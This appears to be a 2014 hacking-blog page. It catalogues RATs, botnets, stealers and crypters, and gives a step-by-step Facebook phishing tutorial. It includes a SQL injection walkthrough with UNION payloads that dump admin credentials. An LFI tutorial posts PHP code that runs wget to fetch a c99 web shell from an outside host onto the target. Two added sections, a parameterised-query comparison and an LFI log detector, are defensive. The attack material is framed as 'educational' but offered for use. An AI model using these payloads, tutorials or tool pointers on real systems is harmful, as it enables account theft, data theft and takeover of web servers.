Welcome Fellow Hacker!

Sunday, May 4, 2014

RATs, Botnets, Stealers: All Programs for Hacking


I will not post any cracked version of any rat

I will update this post when new versions come

All files posted here are CLEAN analyzed by me. If you think any file is infected just don't download it, and don't post shit. ALL files are detected by avs, MALWARE always is detected by avs.

Tools marked with [C] you can find free using Google.

If you report any infected file, POST ANY PROOF or you get -rep

If you want your FREE or PAID rat/botnet/crypter/stealer/keylogger/bitcoin miner/ or any malware related posted here, just pm me with your thread link.


Remote Administration Tools - ( RATS )

- Cybergate 1.07.5 - [Image]

- DarkComet 5.3.1.F - [Image]

- Xtreme Rat 2.9 - [Image]

- Pytho Rat 1.5 - [Image]

- nj Rat 0.4.1 - [Image]

- Grimm Rat 1.3 Beta

- Spy-Net 2.6 - [Image]

- Bifrost 1.2.1 d - [Image]

- CyberEye 1.2 - [Image]

- Poison Ivy 2.3.2 - [Image]

- Schwarze Sonne Rat 2.0 Beta 2 - [Image]

- Turkojan 4.0 - [Image]

- Frutas 0.8 ( Java ) - [Image]

- RoyalNET RAT v1.3 - [Image]

- Bozok 1.1 - [Image]

- Adsocks 1.0 Beta ( Java ) - [Image]

- Greame Rat 1.5 Final

- NovaLite 3.0 - [Image]

- jRat 3 ( Java ) - [Image]

- Lost Door v8.0 Pure - [Image]

- Daleth RAT 1.0 - [Image]

- Coolvibes RAT - [Image] - [Pass: Coolvibes]

- DNA Rat - [Image]

- Cerberus 1.03.5 beta - [Image]

- R.A.I.D. - [Image]

- bRAT - Batch RAT

Remote Administration Tools - ( RATS ) - Paid

- Blackshades - BACKDOORED. [C]

- Cybergate Rat - [Image] [C]

- ClientMesh RAT - [Image]

- Emissary Rat

- NetWire RAT - [Image]

- BlackNix RAT - [Image]

- legacyLink - [Image]

HTTP Botnets

- Umbra Loader 1.1.1 - [Image]

- Umbra Loader 1.2.0 (Version by Hermalit) - [Image]

- VertexNet 1.2.1 - [Image]

- µBOT - [Image]

- Elite Loader - [Image]

- Exodus Loader

HTTP Botnets - Paid

- Andromeda - [Image] [C]

- Smoke Loader - [Image] [C]

- Betabot - [Image]

IRC Botnets

- AryaN Builder

IRC Botnets - PAID

Athena IRC

Password Stealers

- ISR Stealer 0.4.1 - [Image]

- Crime24.NET

- aStealer - [Image]

- iStealer 6.3 Legends ( Outdated ) - [Image]

Keyloggers

- Project Neptune 2.0 - [Image]

- Lion Keylogger V1 - [Image]

- HB 1.2.1 Beta

Crypters - Paid

- RazorCrypt2 - [Image] - [AutoIT] [Start at $20]

- Debug Crypter v3 - [Image] - [.NET] [Start at $25]

- Byte Crypter V8 - [Image] - [.NET] [Start at $36]

- Infinity Crypter v4 - [Image] - [.NET] [Start at $20]

- FLUX CRYPTER - [Image] - [.NET] [Start at $15]

- X-Core Crypter - [Image] - [AutoIt] [Start at $20]

- Soft Crypter - [Image] - [.NET] [Start at $50]

Hack Facebook using Phishing Technique

MAKING FACEBOOK PHISHING SITE TUTORIAL.

Phishing is the act of attempting to acquire information such as usernames and passwords. Phishing directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies.


Tutorial:
Hi friends, I'm again in front of you with an easy and complete phishing tutorial. Phishing tricks have been posted here many times, but almost every user says they can't understand them, so now you can make your phishing page easily, step by step. This has a great advantage: it's the latest FB phishing page made by me. Reply here if you face any problem. Download this phishing script.


Then go to 000webhost.com and choose the free account option.
Now click on free domain.

In registration, choose a password with a combination of capital and small letters and numbers.
After registration, verify your account by email.

Now you can see your control panel (refresh the page if required). Go to the control panel.

You can see a page for uploading your file. (Don't upload the file here; it must be uploaded to the public directory, according to the image below.)

Upload your Facebook page in .zip format.

Now you can see your file below, like this:

That's all...
Now your phishing FB page is YourDomain.com/index.html
index.html is your phishing page.

Now you can send this page to your victims. When your victim logs in to this fake page, their login and password are stored in your hosting directory in lol.txt, like below:





Note: This default FB phishing page redirects to www.google.com.
You can change this by editing hello.php in the downloaded fb phishing.zip pack.

This tutorial is only for educational purposes, to protect you from hackers. Applying this technique may be considered a crime.


Top Ways to Hack Facebook Accounts



Top 8 Ways To Hack Facebook Accounts 

There are various methods to hack a Facebook account password, like keyloggers, phishing websites, etc., whereas bruteforcing, dictionary attacks, DDoS attacks, etc. will not work directly due to the account lockout feature. Today in this post I am going to share a very effective way to hack Facebook accounts; I named it Top 10 ways to hack facebook accounts



8 Ways To Hack Facebook

1. Facebook Phishing 




Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of methods to carry out a phishing attack. In a simple phishing attack, a hacker creates a fake login page which looks exactly like the real Facebook page and then asks the victim to log in to that page. Once the victim logs in through the fake page, the victim's "Email Address" and "Password" are stored in a text file. The hacker then downloads the text file and gets his hands on the victim's credentials.
I have explained the step by step phishing process in my post below:
                     

2. Keylogging 

Keylogging, according to me, is the easiest way to hack a Facebook password. Keylogging can sometimes be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, will record everything the victim types on his/her computer. The logs are then sent back to the attacker either by FTP or directly to the hacker's email address.

I have explained the step by step process in my post 

How To Hack Facebook With keylogging

3. Session Hijacking




Session hijacking can often be very dangerous if you are accessing Facebook on an http:// connection. In a session hijacking attack, a hacker steals the victim's browser cookie, which is used to authenticate a user on a website, and uses it to access the victim's account. Session hijacking is widely used on LANs. I have already written a three-part series on How session hijacking works? and also a separate post on Facebook session hijacking.


4. Sidejacking With Firesheep


Sidejacking attacks became common in late 2010; however, they are still popular nowadays. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim are on the same Wi-Fi network. A sidejacking attack is basically another name for HTTP session hijacking, but it's more targeted towards Wi-Fi users.
To know more about sidejacking attacks and Firesheep, read the post mentioned below:



5. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. If the hacker can gain access to the victim's mobile phone, then he can probably gain access to his/her Facebook account. There are lots of mobile spying software packages used to monitor a cellphone.
The most popular mobile phone spying software is:
1. Mobile Spy

6. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack to replace the original facebook.com page with his own fake page and hence get access to the victim's Facebook account.

7. USB Hacking 

USB password stealer
If an attacker has physical access to your computer, he could just insert a USB drive programmed to automatically extract passwords saved in the browser. I have also posted about this attack, which you can read by accessing the link below:

8. Man In the Middle Attacks

If the victim and attacker are on the same LAN and on a switch-based network, a hacker can place himself between the client and the server, or he could also act as the default gateway, and hence capture all the traffic in between. ARP poisoning, which is the other name for man in the middle attacks, is a very broad topic and is beyond the scope of this article. We have written a couple of articles on man in the middle attacks which can be accessed from the links mentioned below:
If you are really interested in learning how man in the middle attacks work, you can view the presentation


Security Pentesting Tools


Here is a compilation of multiple forensic and penetration testing tools for applications, networks, and websites.

[Image: sitelogo.png]
Nmap
Nmap is a very versatile tool developed to scan addresses (IPv6 included). It allows users to quickly gather a large amount of information about the target, including open ports and much more.
Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan.

[Image: IXcgJ.png]

A very powerful network troubleshooting and analysis tool, Wireshark provides the ability to view data from a live network, and supports hundreds of protocols and media formats.

[Image: logooxid.png]
Cain & Abel

Cain and Abel is a revolutionary tool that provides many functions for various password retrieval jobs: cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist; this is a pleasant twist to modern penetration testing and forensic tools.

[Image: logo.png]

Metasploit is a very powerful network security and analysis tool, often used for penetration attacks. This tool has a clean interface and easily gathers the information that you seek.

[Image: HkR4k.png]

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website)

[Image: FWR_Nessus1.jpg]

The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks.

[Image: 7diZx.png]

Havij is the most common and well-known testing tool for SQL injection and many other web-based injection types. It fluently provides the site's scan, admin look-up, password cracking, and database retrieval. It literally makes it a breeze to hack, and find, vulnerable websites.

[Image: logo_small.png]

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. (Taken from Kismet website)

[Image: CPoer.png]

BackTrack is a widely popular bootable Live-CD Linux distro. BackTrack offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking, for VoIP networks, websites and more. The tool's interface and design provide an easy-to-use layout.

[Image: YLv2g.png]

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation-plugins. In some ways it is like a web-focused Metasploit. (Taken from nmap.org)

[Image: guidance-software-logo.png]
EnCase is a suite of computer forensics software, commonly used by law enforcement. Its wide use has made it a de-facto standard in forensics. It is made to collect data from a computer in a forensically sound manner (employing checksums to help detect tampering). (Taken from Nmap.org.)


[Image: JuEqY.png]

Helix is a live bootable Ubuntu CD, that contains a multitude of forensic tools involving cellphones, computers, file systems, images, and tied into its sheer power is a friendly and easy-to-use interface.

[Image: L4fYp.png]

Acunetix is a strong, and very popular website security tool. It provides many tools to test your website, (or others) for various injections. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

[Image: 6GXN9.png]

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. (Taken from http://portswigger.net/burp/)

Hacking Website using SQL STRING INJECTION

What is String Based SQL injection and how to notice them?
To make this simple to understand: string-based SQL injection happens when the site is vulnerable to SQL injection, but the injected parameter is used as a string (inside quotes) in the query, so the site doesn't show us the results we expect after executing an ordinary SQLi query.
Commonly known signs that a site is vulnerable to string-based injection are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (will show a normal page even though the site is vulnerable to SQLi)



Solution to this issue, in order to hack a site with string-based SQL injection
The answer to this problem is to use the following format when trying to hack a site with SQLi:
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright, now that you've got the point, let's try string-based injection on some of the other types of SQL injection, shall we?


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
The results show an error, so we'll assume there are 10 columns, since it's an example for our process.

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4. Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5. Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based




This will be considered as a mini tutorial for String Based SQL injection. I just hope people are gonna understand this as much as they're on their journey through SQL injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi
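
Why the quote matters, and what removes the problem, as an added example (not code from this post): a lookup that pastes the id between quotes, beside the same lookup with a bound parameter and with input validation. It uses Python's sqlite3 and a constructed `articles` table as a stand-in for the MySQL-backed `index.php?id=` page; the table, data and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the page's index.php?id= lookup.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id TEXT PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [("10", "Welcome"), ("234", "Contact")])
    return db

def lookup_concatenated(db, article_id):
    # Vulnerable form: the value is pasted between quotes, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT id, title FROM articles WHERE id = '" + article_id + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, article_id):
    # Hardened form: the value is bound as a parameter and never parsed as SQL.
    return db.execute(
        "SELECT id, title FROM articles WHERE id = ?", (article_id,)
    ).fetchall()

def lookup_validated(db, article_id):
    # Defence in depth: ids on this (hypothetical) site are numeric,
    # so anything else is rejected before a query is built.
    if not (article_id.isascii() and article_id.isdigit()):
        raise ValueError("id must be numeric")
    return lookup_bound(db, article_id)

def outcome(fn, db, value):
    """Summarise what the page would do: render rows, surface a SQL error, or reject."""
    try:
        return ("rows", fn(db, value))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))

# Inputs as the server sees them after URL decoding ("+" becomes a space).
INPUTS = ["10", "10 order by 1000-- ", "10' order by 1000-- "]

def demo():
    db = make_db()
    lookups = (lookup_concatenated, lookup_bound, lookup_validated)
    return {value: {fn.__name__: outcome(fn, db, value)[0] for fn in lookups}
            for value in INPUTS}

if __name__ == "__main__":
    for value, row in demo().items():
        print(repr(value), row)
```

Without the quote the concatenated lookup treats the whole input as a string and renders an empty but normal page, which is the "order by doesn't work" symptom listed above; with the quote it surfaces a database error, while the bound and validated lookups never parse the input as SQL.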

LFI Exploitation Shell Uploading

Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.

So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:

Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be having a page that looks like this:


Now lets try reading:
Code:
/proc/self/environ
/proc/self/fd
So URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.


Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"

I'll show you how to exploit via php://input using the "Hackbar"

So lets check what we're supposed to use in the Hackbar


Now let's try putting this method in action.
Look at the picture carefully.


URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
 <? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.

Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?

Let's use the "wget" command to spawn our shell on the site.

So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
This is how it's gonna look like.


Now that you've spawned a shell, you can navigate to your shell on the site.
Code:
http://www.site.com/shell.php
You can watch a video tutorial below so that it'll be easier to understand.
Have fun.

Team Intra

If you need any help, feel free to ask me.
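
A detection pass for the requests this post describes, as an added example (not part of the original post): it scans web access-log lines for a file-selecting parameter whose value is an absolute path, a stream wrapper such as php://input, a traversal sequence or a null byte. The log lines are constructed, the parameter name `page` is taken from the post's example URL, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines (common log format); addresses, times and sizes are invented.
SAMPLE_LOG = """\
198.51.100.7 - - [04/May/2014:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.7 - - [04/May/2014:10:01:09 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1432
198.51.100.7 - - [04/May/2014:10:01:15 +0000] "GET /index.php?page=/proc/self/environ%00 HTTP/1.1" 200 310
198.51.100.7 - - [04/May/2014:10:01:31 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 88
203.0.113.20 - - [04/May/2014:10:02:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

def classify(value):
    """Return the reasons a decoded parameter value looks like a file-inclusion probe."""
    reasons = []
    if WRAPPER_RE.match(value):
        reasons.append("stream-wrapper")      # e.g. php://input
    if value.startswith("/"):
        reasons.append("absolute-path")       # e.g. /etc/passwd, /proc/self/environ
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")           # %00 after URL decoding
    return reasons

def scan(log_text, param="page"):
    """Yield one finding per request whose `param` value matches any rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        query = target.partition("?")[2]
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reasons = classify(value)
            if reasons:
                findings.append({"client": client, "method": method,
                                 "status": int(status), "value": value,
                                 "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the application side, the durable fix is to map the parameter to a fixed allowlist of page names instead of passing it to include; PHP also refuses php://input in include while allow_url_include is off, which is the default.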

First Name Only Facebook Trick

How to Have a first name only on Facebook Guide.

STEP 1
Open Firefox:
[Image: Cw7hQ1y.jpg]

STEP 2
Go to - Settings:
[Image: 864u65l.jpg]

Advanced and finally Network. Click on settings and click on Manual proxy configuration.

Next to Http: and Port: write any of the following:
Note: If one of them doesn't work try the next one.

After that tick the checkbox: Use this proxy server for all protocols. And finally click Okay:
[Image: sd7Xe86.jpg]

STEP 3
Go to: https://www.facebook.com/

Login with your Email/Password.
Note: Your account may be locked due to using a proxy! This can be easily fixed by going through the identification process.

Click on Menu located at the right top corner,
Select account settings:
[Image: xdgFKRQ.jpg]

Click edit your language,
Change it to: Bahasa Indonesian and finally click Save changes:
[Image: KuIVHO6.jpg]

Then edit your name,
Remove the last name and hit Simpan Perubahan to save changes:
[Image: 0m21QgX.jpg]

After that click on Bahasa to change the language
back to English and click on Simpan Perubahan:
[Image: Xdi46Md.jpg]
And finally click on top right menu and
hit: Logout to log you out safely:
[Image: i0FSumk.jpg]

After that head over to: Firefox - Options:
[Image: nQOJsQO.jpg]
Followed by: Advanced - Network
and finally Settings again, Remove the proxies and click on:
No Proxy to go out of proxy for faster surfing experience! and
click Okay:
[Image: a2YR43a.jpg]

I am not the owner of this tutorial, so all credit goes to
whoever figured this out. I'm just re-presenting it for educational
purposes and in a way that is easier to follow.

Enjoy and hope you found this much easier to follow.
If you require any help then post below.